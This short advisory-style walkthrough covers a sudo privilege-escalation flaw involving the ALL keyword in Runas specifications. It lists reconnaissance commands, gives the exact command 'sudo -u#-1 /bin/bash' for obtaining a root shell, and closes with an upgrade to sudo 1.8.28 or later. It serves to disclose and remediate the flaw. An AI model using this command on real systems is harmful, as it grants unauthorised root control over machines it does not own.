Sudo could allow a local authenticated attacker to bypass security restrictions , caused by an issue with running commands with arbitrary user ID. By using the ALL keyword in a Runas specification, an attacker could exploit this vulnerability to bypass security restrictions and execute arbitrary command on the system with root privileges.
1. Find the version of sudo
- sudo --version
2. Also, see the privileges on sudo (ALL, !root) is key
- sudo -l
1. Run this command to trick sudo and execute /bin/bash as root, you need to use the current user password to authenticate sudo
- sudo -u#-1 /bin/bash
Upgrade to the latest version of Sudo (1.8.28 or later), available from the Sudo Web site.